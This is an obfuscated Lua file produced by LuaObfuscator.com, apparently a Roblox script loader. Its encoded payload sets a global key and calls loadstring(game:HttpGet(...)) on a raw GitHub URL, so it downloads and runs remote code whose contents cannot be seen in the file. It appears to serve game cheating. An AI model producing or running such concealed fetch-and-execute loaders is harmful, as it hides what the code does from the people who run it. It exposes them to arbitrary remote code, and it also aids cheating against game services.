--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local v14;v15=function(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then v24=nil;v24=function()local v39,v40,v41,v42=v1(v16,v19,v19 + (5 -2));v19=v19 + (1859 -(8 + 1847));return (v42 * ((23998853 -7220992) -(564 + 53 + 28))) + (v41 * (66662 -(892 + 234))) + (v40 * (906 -650)) + v39;end;v25=nil;v18=4;end if (6==v18) then v29=nil;v29=function()local v43=1619 -(510 + 1109);local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v43==(7 -5)) then v48=nil;v49=nil;v43=90 -(71 + 16);end if (v43==1) then v46=nil;v47=nil;v43=402 -(159 + 241);end if ((360 -(91 + 269))==v43) then v44=0;v45=nil;v43=1319 -(231 + 1087);end if (v43==(3 -0)) then v50=nil;while true do if (v44==(1 + 1)) then local v77=0;while true do if (v77==0) then for v96=1,v49 do local v97=0;local v98;local v99;local v100;local v101;while true do if (v97==1) then v100=nil;v101=nil;v97=2;end if (v97==2) then while true do if (v98==0) then local v116=159 -(127 + 32);local v117;while true do if (v116~=(611 -(237 + 374))) then else v117=0;while true do if (v117~=0) then else local v126=0;while true do if (v126==(0 + 0)) then v99=0;v100=nil;v126=1;end if (v126==(1 -0)) then v117=1 + 0;break;end end end if (v117==(359 -(334 + 24))) then v98=1356 -(671 + 684);break;end end break;end end end if (v98==(1 -0)) then v101=nil;while true do if (v99~=(1 + 0)) then else if (v100==1) then v101=v22()~=0;elseif (v100==(9 -7)) then v101=v25();elseif (v100==(60 -(41 + 16))) then v101=v26();end v50[v96]=v101;break;end if ((0 -0)~=v99) then else local v121=1618 -(374 + 1244);local v122;while true do if (v121~=(0 + 0)) then else v122=0;while true do if (v122==(0 -0)) then local v147=0;while true do if (v147~=1) then else v122=1;break;end if (v147==(0 -0)) then v100=v22();v101=nil;v147=1;end end end if (v122==1) then v99=1 + 0;break;end end break;end end end end break;end end break;end if (v97~=(0 -0)) then else v98=0;v99=nil;v97=1 + 0;end end end v48[3]=v22();v77=1 + 0;end if (v77==1) then for v102=2 -1,v24() do local v103=0;local v104;local v105;local v106;local v107;while true do if (0~=v103) then else v104=0;v105=nil;v103=1 -0;end if (2==v103) then while true do if (v104~=1) then else v107=nil;while true do if (v105==(138 -(24 + 113))) then while true do if (v106==(0 + 0)) then v107=v22();if (v21(v107,1,1125 -(584 + 540))==0) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==1) then v145=nil;v146=nil;v142=66 -(59 + 5);end if (v142==2) then while true do if (v143==0) then local v162=0;local v163;while true do if (v162==(0 -0)) then v163=513 -(279 + 234);while true do if (v163~=1) then else v143=1 -0;break;end if (v163~=0) then else local v181=0 -0;while true do if (v181~=(2 -1)) then else v163=1206 -(1005 + 200);break;end if (v181==(1855 -(1527 + 328))) then v144=v21(v107,359 -(292 + 65),3);v145=v21(v107,10 -6,247 -(147 + 94));v181=1;end end end end break;end end end if (v143~=(1 + 0)) then else local v164=820 -(269 + 551);local v165;while true do if (v164==0) then v165=0;while true do if (v165~=0) then else local v182=0;while true do if (v182~=0) then else v146={v23(),v23(),nil,nil};if (v144==(1682 -(1117 + 565))) then local v189=0;local v190;local v191;while true do if (1==v189) then while true do if (v190==(0 -0)) then v191=0;while true do if (v191~=(1923 -(833 + 1090))) then else v146[87 -(82 + 2)]=v23();v146[19 -15]=v23();break;end end break;end end break;end if (v189==0) then v190=0;v191=nil;v189=435 -(81 + 353);end end elseif (v144==1) then v146[3]=v24();elseif (v144==2) then v146[3]=v24() -((2 + 0)^(8 + 8));elseif (v144==3) then local v196=0;local v197;local v198;local v199;while true do if (v196==(0 + 0)) then v197=0;v198=nil;v196=1;end if (v196~=(1232 -(882 + 349))) then else v199=nil;while true do if (v197==(1955 -(740 + 1215))) then local v202=0 -0;while true do if (v202==(2 -1)) then v197=1468 -(573 + 894);break;end if (v202==0) then v198=0;v199=nil;v202=1;end end end if ((3 -2)~=v197) then else while true do if (v198==(0 -0)) then v199=0;while true do if (0==v199) then v146[3]=v24() -((91 -(63 + 26))^16);v146[11 -7]=v23();break;end end break;end end break;end end break;end end end v182=1608 -(382 + 1225);end if (v182==(2 -1)) then v165=4 -3;break;end end end if (v165~=(1166 -(648 + 517))) then else v143=2 + 0;break;end end break;end end end if (v143==3) then if (v21(v145,484 -(32 + 449),891 -(189 + 699))~=1) then else v146[4]=v50[v146[18 -14]];end v45[v102]=v146;break;end if (v143==(219 -(71 + 146))) then local v167=0;local v168;while true do if ((152 -(105 + 47))~=v167) then else v168=0;while true do if (v168==(1226 -(312 + 914))) then if (v21(v145,1 + 0,1)~=(2 -1)) then else v146[30 -(26 + 2)]=v50[v146[2]];end if (v21(v145,2,2 + 0)~=(1228 -(267 + 960))) then else v146[485 -(309 + 173)]=v50[v146[753 -(438 + 312)]];end v168=1 + 0;end if (v168==(1 -0)) then v143=3;break;end end break;end end end end break;end if (v142~=0) then else v143=0;v144=nil;v142=1;end end end break;end end break;end if (v105==0) then local v123=0 -0;while true do if (v123==(1275 -(84 + 1191))) then v106=0 -0;v107=nil;v123=1 + 0;end if (v123==(1 -0)) then v105=63 -(32 + 30);break;end end end end break;end if (0==v104) then local v118=0 + 0;while true do if (v118==(1 + 0)) then v104=1;break;end if (v118==0) then v105=0 + 0;v106=nil;v118=1;end end end end break;end if (v103~=(2 -1)) then else v106=nil;v107=nil;v103=1 + 1;end end end v44=3;break;end end end if (v44~=(0 -0)) then else v45={};v46={};v47={};v44=1;end if (v44~=3) then else local v78=1820 -(372 + 1448);while true do if (v78==0) then for v108=1,v24() do v46[v108-1]=v29();end for v110=1,v24() do v47[v110]=v24();end v78=1;end if (v78==(1 + 0)) then return v48;end end end if (v44~=1) then else local v79=0;while true do if (v79==(1451 -(605 + 846))) then v48={v45,v46,nil,v47};v49=v24();v79=1 + 0;end if (v79==(1 + 0)) then v50={};v44=6 -4;break;end end end end break;end end end;v30=nil;v18=7;end if (v18==7) then v30=function(v31,v32,v33)local v51=v31[1];local v52=v31[2];local v53=v31[3];return function(...)local v63=0;local v64;local v65;local v66;local v67;local v68;while true do if (v63==2) then v68=nil;v68=function()local v80=v51;local v81=v52;local v82=v53;local v83=v28;local v84={};local v85={};local v86={};for v91=0 -0,v67 do if (((2658 -(225 + 105))<=(1658 + 54 + 1588)) and (v91>=v82)) then v84[v91-v82]=v66[v91 + ((3853 -2768) -(351 + 733))];else v86[v91]=v66[v91 + (3 -2)];end end local v87=(v67-v82) + (1387 -(448 + 93 + 845));local v88;local v89;while true do local v92=0 -0;local v93;local v94;while true do if ((v92==(1 -0)) or ((4060 -(148 + 52 + 54))<2469)) then while true do if (((11104 -8776)<(4718 -((1438 -(455 + 193)) + 122))) and (v93==(1412 -(794 + 618)))) then v94=0 + 0;while true do if ((v94==((1354 -(833 + 520)) -0)) or ((2587 -(232 + 1646))>=(190 + 247 + 4244))) then if (((4744 -(22 + 20))>=(14179 -10793)) and (v89<=(5 -1))) then if ((v89<=(1689 -(1287 + (1693 -1292)))) or (1593<1532)) then if (((3949 -(744 + 177))>=(605 + 1658)) and (v89>0)) then v86[v88[1 + 1]]=v88[4 -1];else local v129=0 + 0;local v130;local v131;local v132;local v133;local v134;local v135;while true do if ((v129==(1 + 0)) or (543>(2044 -(1130 + 174)))) then v132=nil;v133=nil;v129=841 -(794 + 45);end if ((v129==(0 -0)) or (3752==841)) then v130=289 -(232 + 57);v131=nil;v129=1 + 0;end if (((2264 + 859)>=432) and (v129==2)) then v134=nil;v135=nil;v129=3 + 0;end if ((v129==3) or ((4346 -((66 -49) + 357))<(91 + 882))) then while true do if (((1139 + 862)==(3657 -(116 + 231 + 1309))) and (v130==(0 -0))) then local v158=0 + 0;while true do if (((2264 -(642 + 51))<((15272 -11394) -(56 + 532))) and (v158==(0 -0))) then v131=1699 -(1030 + 669);v132=nil;v158=1017 -(35 + 981);end if (((6401 -1744)>(3925 + 617)) and (v158==(1302 -(70 + 1231)))) then v130=766 -(728 + 37);break;end end end if (((3481 -(537 + 849 + 506))<(2677 + 609)) and ((1 + 0)==v130)) then local v159=0 -0;while true do if (((5409 -(105 + 1112))>(2229 + 1918)) and (v159==0)) then v133=nil;v134=nil;v159=1 -0;end if ((v159==(1 + 0)) or ((584 -323)==((4155 -(335 + 123)) -2049))) then v130=5 -3;break;end end end if (((1682 + 907)<=((7077 -4994) + (9400 -7143))) and (v130==(2 -0))) then v135=nil;while true do if ((v131==(0 -0)) or (916>=(616 + 1923))) then local v173=0;local v174;while true do if (((458 + 483)<4390) and (v173==(0 + 0 + 0))) then v174=(1057 -(795 + 262)) + 0;while true do if ((v174==(394 -(115 + 278))) or (2170<=((942 + 1442) -(650 + 445 + 156)))) then v131=1 + 0;break;end if ((v174==(0 + 0)) or ((638 + 3513)<(5438 -3547))) then v132=v88[4 -2];v133,v134=v83(v86[v132](v12(v86,v132 + 1 + 0,v88[1 + 2])));v174=1;end end break;end end end if (((4150 -2353)<=2313) and (v131==2)) then for v177=v132,v65 do local v178=0 -0;local v179;local v180;while true do if ((v178==1) or ((1411 -(104 + 180))<(254 -163))) then while true do if ((v179==(0 + 0)) or (1442<=(668 + 261))) then v180=0;while true do if (((2002 -(506 + 874))<(2482 -(1018 + 181))) and (v180==0)) then v135=v135 + 1 + 0;v86[v177]=v133[v135];break;end end break;end end break;end if ((0==v178) or (2909<(3950 -1155))) then v179=1394 -(1345 + 49);v180=nil;v178=2 -1;end end end break;end if ((v131==(2 -1)) or ((2395 -1065)>=3935)) then local v175=1339 -(251 + 1088);local v176;while true do if ((v175==(914 -(505 + 409))) or ((1341 + 1585)<(335 -(1245 -(543 + 463))))) then v176=0;while true do if (((214 + 1580)<=3925) and (v176==(1421 -(442 + 979)))) then local v188=1581 -(202 + 1379);while true do if ((v188==(1 -0)) or ((386 + 1045)>((2879 + 1166) -(4 + 408)))) then v176=1 + 0;break;end if (((1103 -(2106 -(574 + 1165)))<=(5209 -3386)) and (v188==0)) then v65=(v134 + v132) -((572 + 15) -(256 + 330));v135=0 + 0;v188=2 -1;end end end if ((2014>=424) and (v176==(827 -(54 + (2637 -(1636 + 229)))))) then v131=2 + 0;break;end end break;end end end end break;end end break;end end end elseif ((v89<=2) or ((4967 -((388 -(10 + 34)) + (930 -560)))>(4505 -(8 + 44)))) then if ((v86[v88[1 + 1]]==v88[(14 -5) -5]) or ((383 + 788)>=(608 + 2467))) then v64=v64 + (1614 -(814 + 799));else v64=v88[3 -(1439 -(414 + 1025))];end elseif ((v89>3) or (3481==(183 + 24))) then v86[v88[1 + 1]]();else local v149=0 -0;local v150;local v151;while true do if (((776 + (6287 -2912))>(706 -(94 + 46))) and (v149==(1 + 0))) then v86[v150 + 1 + (0 -0)]=v151;v86[v150]=v151[v88[4]];break;end if ((v149==((1418 -(187 + 1231)) -0)) or (864>=1512)) then local v157=0 + 0;while true do if (((1718 -944)<(1752 + 327)) and (0==v157)) then v150=v88[1779 -(388 + (4063 -2674))];v151=v86[v88[8 -5]];v157=1 + 0 + 0;end if ((v157==(886 -(631 + 254))) or ((53 + 3901)<=(6519 -3482))) then v149=1;break;end end end end end elseif ((((537 + 5970) -3253)>=(1966 + 78)) and (v89<=(14 -(19 -11)))) then if (((5544 -(820 + 671))>=(1385 + 1098 + 241)) and (v89>5)) then v86[v88[1440 -(1386 + 52)]]=v33[v88[11 -8]];else local v138=0 + 0;local v139;local v140;while true do if (((10544 -5785)>=2000) and (v138==(0 + 0))) then v139=0;v140=nil;v138=1 + 0;end if ((v138==(1935 -((2369 -(498 + 334)) + 397))) or ((5239 -(436 + 207))==936)) then while true do if (((3808 -2236)<3291) and (v139==(0 -(0 -0)))) then v140=v88[328 -(252 + 74)];v86[v140]=v86[v140](v12(v86,v140 + 1 + 0,v65));break;end end break;end end end elseif (((530 -316)<(2164 -(795 + 11))) and (v89<=(18 -11))) then v64=v88[2 + 1];elseif ((3094>=(1122 + 710)) and (v89==(140 -(77 + 55)))) then v86[v88[2]][v88[2 + 1]]=v88[3 + 1];else do return;end end v64=v64 + (1388 -(476 + 425 + 486));break;end if (((1581 + 172)<=(4162 -(24 + 419))) and (v94==((1142 -(179 + 963)) -0))) then local v119=956 -(236 + 720);while true do if (((5552 -(42 + 1749))>(4710 -(777 + 792))) and (0==v119)) then v88=v80[v64];v89=v88[1 + 0];v119=1;end if (((3840 + 349)>((631 -(12 + 59)) + 1061)) and (v119==(655 -((266 -78) + 466)))) then v94=1 + (82 -(50 + 32));break;end end end end break;end end break;end if ((4193==(1524 + (3415 -(398 + 348)))) and (v92==(1676 -(417 + 1259)))) then v93=0;v94=nil;v92=1 + 0;end end end end;v63=3;end if (v63==1) then v66={...};v67=v11("#",...) -1;v63=2;end if (v63==0) then v64=1;v65= -1;v63=1;end if (v63==3) then A,B=v28(v10(v68));if  not A[1] then local v90=v31[4][v64] or "?";error("Script error at ["   .. v90   .. "]:"   .. A[2]);else return v12(A,2,B);end break;end end end;end;return v30(v29(),{},v17)(...);end if (v18==4) then v25=function()local v54=0 -0;local v55;local v56;while true do if (v54==1) then return (( -(1333 -(675 + 656)) * v21(v56,16 + 16)) + (1 -0)) * ((1 + 1)^(v21(v56,758 -(312 + 425),21 + 10) -(2417 -1394))) * ((((v21(v56,(1923 -1046) -(606 + 81 + 189),8 + 12) * ((611 -(497 + (1771 -(1604 + 55))))^(1146 -(523 + 591)))) + v55)/((1 + 0 + 1)^(122 -70))) + (251 -(233 + 17)));end if (v54==(0 + 0)) then v55=v24();v56=v24();v54=209 -(180 + (39 -11));end end end;v26=nil;v26=function(v34)local v57=0 + 0;local v58;local v59;while true do if (v57==(824 -(420 + 403))) then v58=v3(v16,v19,(v19 + v34) -(4 -3));v19=v19 + v34;v57=1 + 1;end if (v57==(1224 -(447 + 775))) then v59={};for v72=1 + 0, #v58 do v59[v72]=v2(v1(v3(v58,v72,v72)));end v57=3;end if (v57==(0 -0)) then v58=nil;if  not v34 then local v76=0 -(1091 -(774 + 317));while true do if (v76==(0 + 0)) then v34=v24();if (v34==((42 -27) -(7 + 8))) then return "";end break;end end end v57=1 + 0;end if (v57==((891 + 964) -(555 + 1297))) then return v6(v59);end end end;v18=5;end if (v18==2) then v22=function()local v60=v1(v16,v19,v19);v19=v19 + 1;return v60;end;v23=nil;v23=function()local v61,v62=v1(v16,v19,v19 + 2);v19=v19 + 1 + 1;return (v62 * (479 -223)) + v61;end;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v35)if (v1(v35,2)==79) then v20=v0(v3(v35,1,1));return "";else local v69=v2(v0(v35,16));if v20 then local v74=0;local v75;while true do if (v74==1) then return v75;end if (0==v74) then v75=v5(v69,v20);v20=nil;v74=1;end end else return v69;end end end);v18=1;end if (v18==1) then v21=nil;v21=function(v36,v37,v38)if v38 then local v70=(v36/((5 -3)^(v37-(1 -0))))%((4 -2)^(((v38-(1 + 0)) -(v37-(516 -(30 + 485)))) + 1));return v70-(v70%(97 -(51 + 45)));else local v71=((6 -4) -0)^(v37-(1 + 0));return (((v36%(v71 + v71))>=v71) and (1037 -(701 + 188 + 147))) or (18 -(4 + 14));end end;v22=nil;v18=2;end if (v18==5) then v27=v24;v28=nil;v28=function(...)return {...},v11("#",...);end;v18=6;end end end;v15("LOL!083O00028O0003023O005F472O033O004B6579030C3O00746E756F2O63646E326C6176030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403483O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073782D536372697074732F70737873632F6D61696E2F7363726970742D76342D312E6C7561000F3O0012013O00013O0026023O0001000100010004073O00010001001206000100023O003008000100030004001206000100053O001206000200063O002003000200020007001201000400086O000200044O000500013O00022O00040001000100010004073O000E00010004073O000100012O00093O00017O000F3O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v8(),...);end
